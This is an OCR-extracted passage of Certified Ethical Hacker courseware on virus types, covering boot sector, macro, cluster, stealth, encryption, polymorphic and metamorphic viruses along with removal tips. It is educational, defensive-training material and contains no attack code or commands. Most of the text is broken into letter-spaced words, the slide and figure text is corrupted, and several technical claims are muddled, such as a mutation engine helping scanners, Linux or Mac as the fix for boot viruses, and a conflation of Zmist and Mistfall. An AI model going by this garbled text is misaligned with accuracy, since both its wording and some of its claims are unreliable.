lls it s e lf in t h e file it a t t e m p t s t o in f e c t. S parse In fec to r V iruses a® A sp arse i n f e c t o r v iru s i n f e c ts o n l y o c c a s i o n a l l y (e.g., e v e r y t e n t h p r o g r a m e x e c u te d ) o r o n l y file s w h o s e le n g t h s fa ll w i t h i n a n a r r o w ra n g e . C o m p an io n V iruses T h e c o m p a n i o n v ir u s s to re s it s e lf b y h a v in g t h e i d e n t i c a l f i l e n a m e as t h e t a r g e t e d p r o g r a m file . As s o o n as t h a t f ile is e x e c u t e d , t h e v ir u s in f e c ts t h e c o m p u t e r , a nd h a r d d is k d a ta is m o d if ie d . C am o u flag e V iruses ^ W -------- T h e y d is g u is e t h e m s e l v e s as g e n u in e a p p li c a t i o n s o f t h e user. T he se v iru s e s a re n o t d i f f i c u l t t o f i n d since a n t i v i r u s p r o g r a m s h a v e a d v a n c e d t o t h e p o i n t w h e r e such v iru s e s are e a sily t r a c e d . Shell V iruses _____ T his v ir u s c o d e f o r m s a la y e r a r o u n d t h e t a r g e t h o s t p r o g r a m 's c o d e t h a t can be M odule 07 Page 1036 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 32. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker c o m p a r e d t o an " e g g s h e l l / ‫ ׳‬m a k in g i t s e lf t h e o rig in a l p r o g r a m a n d t h e h o s t c o d e its s u b r o u t i n e . H e re , t h e o rig in a l c o d e is m o v e d t o a n e w l o c a t io n by t h e v ir u s c o d e a n d t h e v i r u s a s s u m e s its i d e n t it y . F ile E xtension V iru ses F. File e x t e n s i o n v ir u s e s c h a n g e t h e e x te n s io n s o f file s ; .TXT is safe, as it in d ic a te s a p u r e t e x t file . If y o u r c o m p u t e r 's f i l e e x t e n s i o n s v i e w is t u r n e d o f f a n d s o m e o n e s e n d s y o u a file n a m e d BA D .T X T .V B S , y o u w i ll see o n l y B A D .TXT. > '« f| Add -on V iru ses M o s t v iru s e s a re a d d - o n v iru s e s . T his t y p e o f v ir u s a p p e n d s its c o d e t o t h e b e g in n in g o f t h e h o s t c o d e w i t h o u t m a k in g a n y c h a n g e s t o t h e l a t t e r . T hu s , t h e v ir u s c o r r u p t s t h e s t a r t u p i n f o r m a t i o n o f t h e h o s t c o d e , a n d places it s e lf in its p la ce, b u t it d o e s n o t t o u c h t h e h o s t c o d e . H o w e v e r , t h e v iru s c o d e is e x e c u t e d b e f o r e t h e h o s t c o d e . T h e o n l y in d i c a t i o n t h a t t h e file is c o r r u p t e d is t h a t t h e size o f t h e file has in c re a s e d . In tru siv e V iruses ‫־־‬ T his f o r m o f v ir u s o v e r w r i t e s its c o d e e i t h e r b y c o m p l e t e l y r e m o v i n g t h e t a r g e t h o s t's p r o g r a m c o d e , o r s o m e t i m e s it o n l y o v e r w r i t e s p a r t o f it. T h e r e f o r e , t h e o rig in a l c o d e is n o t e x e c u te d p r o p e r ly . D irec t A ction or T ra n sie n t V iruses T r a n s fe r s all c o n t r o l s t o t h e h o s t c o d e w h e r e it reside s, se le c ts t h e t a r g e t p r o g r a m t o be m o d if ie d , a nd c o r r u p t s it. =— T e rm in a te a n d Stay R e sid en t V iru ses (TSRs) ffr A TSR v i r u s r e m a in s p e r m a n e n t l y in m e m o r y d u r in g t h e e n t i r e w o r k se ssio n, e v e n a f t e r t h e t a r g e t h o s t p r o g r a m is e x e c u te d a n d t e r m i n a t e d . It can be r e m o v e d o n l y b y r e b o o t i n g t h e s y s te m . M odule 07 Page 1037 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 33. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker System or Boot Sector Viruses CEH Boot Sector Virus Boot sector virus moves MBR to another location on the hard disk and copies itself to the original location of MBR Execution © o When system boots, virus code is executed first and then control is passed to original MBR Before Infection After Infection Virus Code MBR Copyright © by E& Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. S y s te m o r B oot S e c to r V iru s e s m S y s te m s e c t o r v iru s e s can be d e f i n e d as t h o s e t h a t a f f e c t t h e e x e c u t a b l e c o d e o f t h e disk, r a t h e r t h a n t h e b o o t s e c t o r v ir u s t h a t a ffe c ts t h e DOS b o o t s e c t o r o f t h e disk. A n y s y s te m is d iv i d e d i n t o a reas, c a lle d s e c to rs , w h e r e t h e p r o g r a m s a re s to r e d . T h e t w o ty p e s o f s y s te m s e c to r s are: Q M B R ( M a s te r B o o t R ecord) M BR s a re t h e m o s t v i r u s - p r o n e z o n e s b e c a u s e if t h e M B R is c o r r u p t e d , all d a ta w i ll be lost. 0 DBR (DO S B o ot R ecord) T h e DOS b o o t s e c t o r is e x e c u t e d w h e n e v e r t h e s y s te m is b o o t e d . T his is t h e c r u c ia l p o i n t o f a t t a c k f o r viru s e s . T h e s y s te m s e c t o r co n s is ts o f 5 1 2 b y t e s o f m e m o r y . Because o f th is , s y s te m s e c t o r v iru s e s c o n c e a l t h e i r c o d e in s o m e o t h e r d isk space. T h e m a in c a r r i e r o f s y s te m s e c t o r v iru s e s is t h e f l o p p y disk. T h e se v iru s e s g e n e r a lly re s id e in t h e m e m o r y . T h e y can also be c a u se d b y T ro ja n s . S o m e s e c t o r v iru s e s also s p re a d t h r o u g h i n f e c t e d file s , a n d t h e y a re ca lle d m u l t i p a r t v iru s e s . M odule 07 Page 1038 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 34. Ethical Hacking and Countermeasures Viruses and W orm s 1 Exam 312-50 C ertified Ethical Hacker Virus Rem oval S y s te m s e c t o r v iru s e s a re d e s ig n e d t o c r e a te t h e illu s io n t h a t t h e r e is n o v ir u s o n t h e s y s te m . O n e w a y t o d ea l w i t h t h is v ir u s is t o a v o id t h e use o f t h e W i n d o w s o p e r a t i n g s y s t e m , a n d s w it c h t o L in ux o r M a cs, b e c a u s e W i n d o w s is m o r e p r o n e t o th e s e a tta c k s . L inux a n d M a c i n t o s h h a v e a b u i l t - i n s a f e g u a r d t o p r o t e c t a g a in s t th e s e v iru s e s . T h e o t h e r w a y is t o c a r r y o u t a n t i v i r u s ch e c k s o n a p e r io d ic basis. Before Infection G After Infection V O Virus Code FIGURE 7.6: System or Boot Sector Viruses M odule 07 Page 1039 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 35. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker File and Multipartite Viruses CEH F ile a n d M u ltip a rtite V iru s e s F ile Viruses File v iru s e s i n f e c t file s t h a t a re e x e c u te d o r i n t e r p r e t e d in t h e s y s te m such as C O M , EXE, SYS, OVL, OBJ, PRG, M N U , a n d BAT file s. File v iru s e s can be e i t h e r d i r e c t - a c t i o n ( n o n - r e s i d e n t ) o r m e m o r y - r e s i d e n t . O v e r w r i t i n g v iru s e s ca use i r r e v e r s i b l e d a m a g e t o t h e files. T h e s e v iru s e s m a i n l y t a r g e t a r a n g e o f o p e r a t i n g s y s te m s t h a t in c lu d e W i n d o w s , UNIX, DOS, a n d M a c i n t o s h . C h a ra c te riz in g F ile V iruses File v iru s e s a re m a i n l y c h a r a c te r iz e d and d e s c r ib e d b ase d on th e ir p h ysica l b e h a v io r o r c h a r a c te r is t ic s . T o cla ssify a file v ir u s is b y t h e t y p e o f file t a r g e t e d by it, such as EXE o r C O M file s, t h e b o o t s e c to r , e tc. A f ile v ir u s can also be c h a r a c t e r iz e d b ase d o n h o w it i n f e c ts t h e t a r g e t e d file (also k n o w n as t h e h o s t files): Q P re p e n d in g : w r i t e s it s e lf i n t o t h e b e g in n in g o f t h e h o s t file 's c o d e Q A p p e n d in g : w r i t e s it s e lf t o t h e e n d o f t h e h o s t file © O v e rw ritin g : o v e r w r i t e s t h e h o s t file 's c o d e w i t h its o w n c o d e Q In s ertin g : in s e rts it s e lf i n t o gaps in s id e t h e h o s t file 's c o d e M odule 07 Page 1040 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 36. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker © C o m p a n io n : r e n a m e s t h e o rig in a l f ile a n d w r i t e s it s e lf w i t h t h e h o s t file 's n a m e © C av ity in fe c to r: w r i t e s it s e lf b e t w e e n file s e c tio n s o f 3 2 - b i t file File v iru s e s a re also cla ssifie d b ase d o n w h e t h e r t h e y a re n o n - m e m o r y r e s i d e n t o r m e m o r y r e s id e n t. N o n - m e m o r y r e s i d e n t v iru s e s s e a rch f o r EXE fi l e s o n a h a r d d r iv e a n d t h e n i n f e c t t h e m , w h e r e a s m e m o r y r e s i d e n t v iru s e s sta ys a c tiv e ly in m e m o r y , a n d t r a p o n e o r m o r e s y s te m f u n c t io n s . File v iru s e s a re said t o be p o l y m o r p h i c , e n c r y p t e d , o r n o n - e n c r y p t e d . A p o l y m o r p h i c o r e n c r y p t e d v ir u s c o n t a in s o n e o r m o r e d e c r y p t o r s a n d a m a in co d e . M a i n v ir u s c o d e is d e c r y p t e d b y t h e d e c r y p t o r b e f o r e i t s ta rts . A n e n c r y p t e d v ir u s u s u a lly uses v a r ia b le o r fi x e d k e y d e c r y p t o r s , w h e r e a s p o l y m o r p h i c v iru s e s h a ve d e c r y p t o r s t h a t a re r a n d o m l y g e n e r a t e d f r o m i n s t r u c t i o n s o f p r o c e s s o rs a n d t h a t c o n s is t o f a l o t o f c o m m a n d s t h a t a re n o t used in t h e d e c r y p t i o n p ro c e s s . E xecu tio n o f P aylo ad: © © T im e b o m b : A f t e r a s p e c ifie d p e r io d o f t i m e © Q D ir e c t a c tio n : I m m e d i a t e l y u p o n e x e c u t io n C o n d i t i o n t r ig g e r e d : O n ly u n d e r c e r ta in c o n d it io n s M ultip artite Viruses A m u l t i p a r t i t e v ir u s is also k n o w n as a m u l t i - p a r t v i r u s t h a t a t t e m p t s t o a t t a c k b o t h t h e b o o t s e c t o r a n d t h e e x e c u ta b le o r p r o g r a m file s a t t h e s a m e t i m e . W h e n r g w v ir u s is a t t a c h e d t o t h e b o o t s e c to r , it w i ll in t u r n a f f e c t t h e s y s te m file s , a n d t h e n t h e v ir u s a tta c h e s t o t h e file s, a n d t h is t i m e it w ill in t u r n i n f e c t t h e b o o t s e c to r . FIGURE 7.7: File and Multipartite Viruses M odule 07 Page 1041 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 37. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker CEH M a c r o V ir u s e s 14 Urt fw ilhiul lUtbM 0 0 11. Infects Macro Enabled Documents 0 Attacker User 0 r 0 0 ‫ץ‬ 0 Macro viruses infect templates or convert infected documents into template files, while maintainingtheir appearance of ordinary documentfiles 0 Most macro viruses are written using macro language Visual Basic for Applications (VBA) r V 0 0 0 0 Copyright © by E -CIllicit Al 1Rights Reserved. Reproduction is Strictly Prohibited. Ca M a c ro V iru se s M i c r o s o f t W o r d o r s i m i l a r a p p li c a t i o n s can be i n f e c t e d t h r o u g h a c o m p u t e r v i r u s c a lle d m a c r o v iru s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c tio n s w h e n t h e a p p li c a t i o n is t r i g g e r e d o r s o m e t h i n g else. M o s t m a c r o v iru s e s a re w r i t t e n u s in g t h e m a c r o la n g u a g e V is u a l Basic f o r A p p l i c a t i o n s (V B A ) a n d t h e y i n f e c t t e m p l a t e s o r c o n v e r t i n f e c t e d d o c u m e n t s i n t o t e m p l a t e file s, w h i l e m a i n t a i n in g t h e i r a p p e a r a n c e o f o r d i n a r y d o c u m e n t file s. M a c r o v ir u s e s a re s o m e w h a t less h a r m f u l t h a n o t h e r ty p e s . T h e y a re u s u a lly s p re a d via an e m a il. P ure d a ta file s d o n o t a l l o w t h e s p re a d o f v iru s e s , b u t s o m e t i m e s t h e lin e b e t w e e n a d a ta f ile a n d an e x e c u t a b l e f i l e is e a sily o v e r l o o k e d by t h e a v e r a g e u se r d u e t o t h e e x te n s iv e m a c r o la n g u a g e s in s o m e p r o g r a m s . In m o s t cases, j u s t t o m a k e t h in g s easy f o r users, t h e lin e b e t w e e n a d a ta file a n d a p r o g r a m s ta r t s t o b lu r o n l y in cases w h e r e t h e d e f a u l t m a c r o s a re s e t t o ru n a u t o m a t i c a l l y e v e r y t i m e t h e d a ta file is lo a d e d . V ir u s w r i t e r s can e x p l o i t c o m m o n p r o g r a m s w i t h m a c r o c a p a b i l it y such as M i c r o s o f t W o r d , Excel, a n d o t h e r O ffic e p r o g r a m s . W i n d o w s H e lp file s can also c o n t a i n m a c r o c o d e . In a d d it io n , t h e la t e s t e x p l o i t e d m a c r o c o d e e xists in t h e fu ll v e r s io n o f t h e A c r o b a t p r o g r a m t h a t re a d s a n d w r i t e s PDF files. M odule 07 Page 1042 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 38. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Infects M acro Enabled Documents Attacker User FIGURE 7.8: Macro Viruses M odule 07 Page 1043 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 39. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker C EH C lu s te r V ir u s e s C luster V iruses J a Cluster viruses modify directory table entries so that it points users or system processes to the virus code instead of the actual program :‫ ב‬I ■ ■ ■ ‫] * :ן‬ V iru s Copy J There is only one copy of the virus on the disk infecting all the programs in the computer system Launch Its e lf J It will launch itself first when any program on the computer system is started and then the control is passed to actual program Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited -C C lu s te r V iru se s C lu s te r v iru s e s in f e c t file s w i t h o u t c h a n g in g t h e file o r p la n t in g e x tr a file s t h e y c h a n g e t h e DOS d i r e c t o r y i n f o r m a t i o n so t h a t e n t r i e s p o i n t t o t h e v ir u s c o d e in s te a d o f t h e a c tu a l p r o g r a m . W h e n a p r o g r a m r u n s DOS, it f i r s t lo a d s a n d e x e c u te s t h e v iru s c o d e , a n d t h e n t h e v ir u s lo c a te s t h e a c tu a l p r o g r a m a n d e x e c u te s it. D ir-2 is an e x a m p le o f t h is t y p e o f v iru s . C lu s te r v iru s e s m o d i f y d i r e c t o r y t a b l e e n t r i e s so t h a t d i r e c t o r y e n t r i e s p o i n t t o t h e v ir u s c o d e . T h e r e is o n l y o n e c o p y o f t h e v ir u s o n t h e d is k i n f e c t i n g all t h e p r o g r a m s in t h e c o m p u t e r s y s te m . It w i ll la u n c h i t s e lf f i r s t w h e n a n y p r o g r a m o n t h e c o m p u t e r s y s te m is s t a r t e d a n d t h e n t h e c o n t r o l is p assed t o t h e a c tu a l p r o g r a m . M odule 07 Page 1044 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 40. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker S te a lth /T u n n e lin g V ir u s e s CEH These viruses evade the anti-virus software by intercepting its requests to the operating system A virus can hide itself by intercepting the anti-virus software's request to read the file and passingthe request to the virus, instead of the OS The virus can then return an uninfected version of the file to the antivirus software, so that it appears as if the file is "clean" Hides Infected TCPIP.SYS i f Here you go Original TCPIP.SYS Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C S te a lth /T u n n e lin g V iru se s I S te a lth V ir u s e s T h e s e v iru s e s t r y t o h id e t h e m s e l v e s f r o m a n t i v i r u s p r o g r a m s by a c tiv e ly a lt e r in g a nd c o r r u p t i n g t h e c h o s e n s e rv ic e call i n t e r r u p t s w h e n t h e y a re b e in g ru n . R e q u e s ts t o p e r f o r m o p e r a t i o n s in r e s p e c t t o th e s e se rv ic e call i n t e r r u p t s a re r e p la c e d by v iru s c o d e . T h e se v iru s e s s ta te fa lse i n f o r m a t i o n t o h id e t h e i r p r e s e n c e f r o m a n t i v i r u s p r o g r a m s . For e x a m p le , t h e s t e a l t h v i r u s h id e s t h e o p e r a t i o n s t h a t it m o d i f i e d a n d g ive s fa ls e r e p r e s e n t a t i o n s . T hu s, it ta k e s o v e r p o r t i o n s o f t h e t a r g e t s y s te m a nd h id e s its v ir u s co d e . T h e s t e a lt h v iru s h id e s it s e lf f r o m a n t i v i r u s s o f t w a r e by h id in g t h e o rig in a l size o f t h e file o r t e m p o r a r i l y p la c in g a c o p y o f it s e lf in s o m e o t h e r d r iv e o f t h e s y s te m , t h u s r e p la c in g t h e i n f e c t e d file w i t h t h e u n i n f e c t e d file t h a t is s t o r e d o n t h e h a r d d riv e . A s t e a lt h v ir u s h id e s t h e m o d if ic a t i o n s t h a t it m a k e s . It ta k e s c o n t r o l o f t h e s y s te m 's f u n c t io n s t h a t re a d file s o r s y s te m s e c to r s a n d , w h e n a n o t h e r p r o g r a m r e q u e s ts i n f o r m a t i o n t h a t has a lr e a d y b e e n m o d i f i e d by t h e v iru s , t h e s t e a l t h v i r u s r e p o r t s t h a t i n f o r m a t i o n t o t h e r e q u e s t i n g p r o g r a m in s te a d . T his v ir u s a lso re s id e s in t h e m e m o r y . T o a v o id d e t e c t i o n , th e s e v iru s e s a lw a y s t a k e o v e r s y s te m f u n c t i o n s a n d use t h e m t o h id e t h e i r p re s e n c e . M odule 07 Page 1045 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 41. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker O n e o f t h e c a rr ie r s o f t h e s t e a lth v ir u s is t h e r o o t k i t . In s ta llin g a r o o t k i t g e n e r a l l y r e s u lts in t h is v ir u s a t t a c k b e c a u s e r o o t k i t s a re in s t a lle d via T ro ja n s , a n d t h u s a re c a p a b le o f h id in g a n y m a lw a re . R e m o v a l: Q A lw a y s d o a c o ld b o o t ( b o o t f r o m w r i t e - p r o t e c t e d f l o p p y d isk o r CD) © N e v e r use DOS c o m m a n d s such as FDISK t o fix t h e v iru s e Use a n t i v i r u s s o f t w a r e / Tunneling Viruses T h e s e v iru s e s t r a c e t h e s te p s o f i n t e r c e p t o r p r o g r a m s t h a t m o n i t o r o p e r a t i n g s y s t e m r e q u e s ts so t h a t t h e y g e t i n t o BIOS a n d DOS t o in s ta ll th e m s e lv e s . To p e r f o r m th is a c tiv it y , t h e y even tu n n e l u n d e r a n tiv iru s s o ftw a re p ro g ra m s. Give me the system file tcpip.syi to icon Anti-virus Software Hides Infected TCPIP.SYS * VIRUS Here you go Original TCPIP.SYS FIGURE 7.9: Working of Stealth/Tunneling Viruses M odule 07 Page 1046 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 42. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker CEH E n c r y p tio n V ir u s e s ‫־׳י‬ ‫י‬ This type of virus uses simple encryption to encipher the code Virus Code V r The virus is encrypted with a different key for each infected file V. AV scanner cannot directly detect these types of viruses using signature detection methods ­‫ץ‬ Encryption Virus 2 Encryption Virus 3 -/ Copyright © by E& Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. E n c ry p tio n V iru se s T his t y p e o f v ir u s co n s is ts o f an e n c r y p t e d c o p y o f t h e v iru s a nd a d e c r y p t i o n m o d u l e . T h e d e c r y p t i n g m o d u l e r e m a in s c o n s t a n t , w h e r e a s t h e d i f f e r e n t keys a re u sed f o r e n c r y p t i o n . T h e s e v iru s e s g e n e r a l l y e m p l o y XO R o n e a ch b y te w i t h a r a n d o m i z e d key. © T h e v ir u s is e n c i p h e r e d w i t h an e n c r y p t i o n k e y t h a t co n s is ts o f a d e c r y p t i o n m o d u l e a nd an e n c r y p t e d c o p y o f t h e c o d e . Q For e a ch i n f e c t e d file , t h e v ir u s is e n c r y p t e d b y u sin g a d i f f e r e n t c o m b i n a t i o n o f keys, b u t t h e d e c r y p t i n g m o d u l e p a r t r e m a in s u n c h a n g e d . It is n o t p o s s ib le f o r t h e v ir u s s c a n n e r t o d ir e c t ly d e te c t th e v ir u s by m e a n s o f s ig n a t u r e s , b u t t h e d e c r y p t i n g m o d u l e ca n be d e t e c t e d . e T h e d e c r y p t i o n t e c h n i q u e e m p lo y e d is x o r e a ch b y te w i t h a r a n d o m i z e d ke y t h a t is g e n e r a t e d a n d sa ved b y t h e r o o t v iru s . M odule 07 Page 1047 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 43. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Virus Code Encryption Virus 1 Encryption Virus 2 Encryption Virus B FIGURE 7.10: Working of Encryption Viruses M odule 07 Page 1048 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 44. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker CEH P o ly m o r p h ic C o d e J Polymorphic code is a code that mutates while keeping the original algorithm intact J To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine J A well-written polymorphic virus therefore has no parts that stay the same on each infection 39Encrypted Mutation Engine Encrypted Virus Code Decryptor Routine ............ Decryptor routine decrypts virus code and mutation engine New Polymorphic Virus User Runs an Infected Program RAM Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. P o ly m o rp h ic C o d e P o l y m o r p h ic v iru s e s m o d i f y t h e i r c o d e f o r e a ch r e p li c a t i o n in o r d e r t o a v o i d d e t e c t i o n . T h e y a c c o m p lis h t h is b y c h a n g in g t h e e n c r y p t i o n m o d u l e a nd t h e i n s t r u c t i o n s e q u e n c e . A r a n d o m n u m b e r g e n e r a t o r is used f o r i m p l e m e n t i n g p o l y m o r p h i s m . A m u t a t i o n e n g in e is g e n e r a l l y used t o e n a b le p o l y m o r p h i c c o d e . T h e m u t a t o r p r o v id e s a s e q u e n c e o f i n s t r u c t i o n s t h a t a v i r u s s c a n n e r can use t o o p t i m i z e an a p p r o p r i a t e d e t e c t i o n a lg o r i t h m . S lo w p o l y m o r p h i c c o d e s a re u sed t o p r e v e n t a n t i v i r u s p r o f e s s i o n a l s f r o m accessing th e codes. V ir u s s a m p le s , w h i c h a re b a it file s a f t e r a s ing le e x e c u t i o n is i n f e c t e d , c o n t a i n a s i m i l a r c o p y o f t h e viru s . A s im p le i n t e g r i t y c h e c k e r is used t o d e t e c t t h e p r e s e n c e o f a p o l y m o r p h i c v iru s in th e s y s te m 's disk. M odule 07 Page 1049 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 45. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Encrypted Mutation Engine (EME) ncrypted M utation j ‫ י‬Encry Engine i I A © Encrypted Virus Code I Decryptor Routine A Instruct to • 0 i • Instruct to Decryptor routine decrypts virus code and mutation engine New Polymorphic * © Virus Does the Damage User Runs an Infected Program Virus RAM FIGURE 7.11: How Polymorphic Code Work P o l y m o r p h ic v iru s e s c o n s is t o f t h r e e c o m p o n e n t s . T h e y a re t h e e n c r y p t e d v i r u s c o d e , t h e d e c r y p t o r r o u t i n e , a n d t h e m u t a t i o n e n g in e . T h e f u n c t i o n o f t h e d e c r y p t o r r o u t i n e is t o d e c r y p t t h e v ir u s c o d e . It d e c r y p t s t h e c o d e o n l y a f t e r t a k i n g c o n t r o l o v e r t h e c o m p u t e r . T h e m u t a t i o n e n g in e g e n e r a t e s r a n d o m i z e d d e c r y p t i o n r o u t in e s . T his d e c r y p t i o n r o u t i n e s v a rie s e v e r y t i m e w h e n a n e w p r o g r a m is i n f e c t e d by t h e viru s . W i t h a p o l y m o r p h i c v iru s , b o t h t h e m u t a t i o n e n g in e a n d t h e v ir u s c o d e a re e n c r y p t e d . W h e n a p r o g r a m t h a t is i n f e c t e d w i t h a p o l y m o r p h i c v ir u s is ru n b y t h e user, t h e d e c r y p t o r r o u t i n e ta k e s c o m p l e t e c o n t r o l o v e r t h e s y s te m , a f t e r w h i c h it d e c r y p t s t h e v iru s c o d e a n d t h e m u t a t i o n e n g in e . N e x t, t h e c o n t r o l o f y o u r s y s te m is t r a n s f e r r e d by t h e d e c r y p t i o n r o u t i n e t o t h e v iru s , w h i c h lo c a te s a n e w p r o g r a m t o in f e c t. In R A M ( R a n d o m Access M e m o r y ) , t h e v ir u s m a k e s a r e p lic a o f it s e lf as w e l l as t h e m u t a t i o n e n g in e . T h e n t h e v ir u s in s t r u c t s t h e e n c r y p t e d m u t a t i o n e n g in e to g en erate a new ra n d o m iz e d d e c ry p tio n ro u tin e , w h ic h has t h e c a p a b i l it y of d e c r y p t i n g v iru s . H ere, t h is n e w c o p y o f b o t h t h e v ir u s c o d e a n d m u t a t i o n e n g in e is e n c r y p t e d by t h e v iru s . T hu s, t h is v iru s , a lo n g w i t h t h e n e w ly e n c ry p te d v iru s co d e and e n c ry p te d m u t a t i o n e n g in e (EM E), a p p e n d s t h is n e w d e c r y p t i o n r o u t i n e o n t o a n e w p r o g r a m , t h e r e b y c o n t i n u i n g t h e pro cess . P o l y m o r p h ic v iru s e s t h a t re s p re a d b y t h e a t t a c k e r in t a r g e t e d s y s te m s a re d i f f i c u l t t o d e t e c t b e c a u s e h e r e t h e v ir u s b o d y is e n c r y p t e d a n d t h e d e c r y p t i o n r o u t i n e s c h a n g e s e ach t i m e f r o m in f e c t i o n t o i n f e c t i o n a n d n o t w o in f e c t i o n s lo o k t h e s a m e ; th is m a k e it d i f f i c u l t f o r t h e v iru s s c a n n e r t o i d e n t i f y t h is v iru s . M odule 07 Page 1050 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 46. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker M e ta m o r p h ic V ir u s e s M e ta m o rp h ic V iru s e s M e ta m o rp h ic C o d e Metamorphic viruses rewrite themselves completely each time they are to infect new executable Metamorphic code can reprogram itself by translating its own code into a temporary representation and then back to the normal code again CEH UrtMM itkNjI lUilwt MotaphoR V I by tHE moNTAL D illlei/2 9* For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it is part of the metamorphic engine E3 M etaphoRV bj •H m LDI# /29* I E tfJTA < h E l a V tA .) arian c T e"U official” V t C .) h n arian at IAHM 1 IL bY iH ni Ntnl cttllller/^JA J fc m tA G 1b B tH• E PH R Y A 1LER/2* r£TAfSC« iCbVlHE n£W dFIIUi/2^ »4l E l [1E b.) V a ria n t B I d .) T h e .D v a ria n t ( w h ic h w a s th e * o ffic ia l' C o f t h e o rig in a l a u th o r) Copyright © by E& Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. M e ta m o rp h ic V iru se s S o m e v iru s e s r e w r i t e t h e m s e l v e s t o in f e c t n e w l y e x e c u te d files. Such v iru s e s are c o m p le x a n d use m e t a m o r p h i c e n g in e s f o r e x e c u t io n . A c o d e t h a t can r e p r o g r a m it s e lf is c a lle d m e t a m o r p h i c c o d e . T his c o d e is t r a n s l a t e d i n t o t h e t e m p o r a r y c o d e , a n d t h e n c o n v e r t e d b a ck t o t h e n o r m a l c o d e . This t e c h n i q u e , in w h i c h t h e o rig in a l a l g o r i t h m r e m a in s in t a c t , is used t o a v o id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e . This is m o r e e f f e c t i v e in c o m p a r i s o n t o p o l y m o r p h i c c o d e . T his t y p e o f v ir u s c o n s is ts o f c o m p le x e x te n s iv e c o d e . T h e c o m m o n l y k n o w n m e t a m o r p h i c v iru s e s a re : W in 3 2 /S im ile : T his v ir u s is w r i t t e n in a s s e m b ly la n g u a g e a n d d e s t i n e d f o r M i c r o s o f t W i n d o w s . T his p ro c e s s is c o m p le x , a n d n e a r ly 9 0 % o f v i r u s c o d e s a re g e n e r a t e d b y t h is pro cess. Z m ist: Z m is t is also k n o w n as t h e Z o m b ie . M is t f a l l is t h e f i r s t v i r u s t o use t h e t e c h n i q u e c a lle d " c o d e i n t e g r a t i o n . " T his c o d e in s e rts i t s e lf i n t o o t h e r c o d e , r e g e n e r a t e s t h e c o d e , a n d r e b u ild s t h e e x e c u ta b le . M odule 07 Page 1051 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 47. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker □ a.) Variant A c.) The "Unofficial" Variant C Im ElAPHOR 1b BY tHe MeNTAI drilLER/29A 12 mEtAPHOR 1b BY tHe MeNTAI di!LER/ r o in b.) Variant B aA m mETAPhOr 1C bY tHE mENtal dRllle1/29A Q mETAPhOr 1C bY (HE mENtal dRlller/29A ‫ .....ו‬ok...‫ך‬ d.) The .D variant (which was the "official" C of the original author) FIGURE 7.12: Metamorphic Viruses Screenshot M odule 07 Page 1052 Ethical Hacking and C ounterm easures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is S trictly Prohibited.
